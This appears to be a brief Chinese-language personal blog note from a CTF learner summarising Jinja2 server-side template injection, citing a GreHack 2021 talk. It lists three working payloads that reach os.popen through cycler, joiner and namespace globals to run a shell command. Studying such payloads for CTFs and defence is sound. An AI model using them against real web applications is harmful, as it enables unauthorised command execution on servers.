SSTI总结

Posted on 2022-04-25 Edited on 2022-10-06 In 安全知识学习

SSTI相关知识总结

第一次遇到 SSTi 的题目是在去年安恒三月赛中那也是我第一次打CTF比赛？不知不觉一年已经过去了

不同时期学习知识当然要有不同的体悟

现在重新总结一下ssti 相关知识希望可以得到新的体悟

原理啥的这里我就不讨论了网上介绍的一大堆

重点关注一下 payload 和绕过

最近看到的一篇不错的演讲pdf – GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2_slides

最总给出来三个payload

1
2
3

{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}

主要是讲解搜寻payload的方法

关于绕过可参考 hacktrick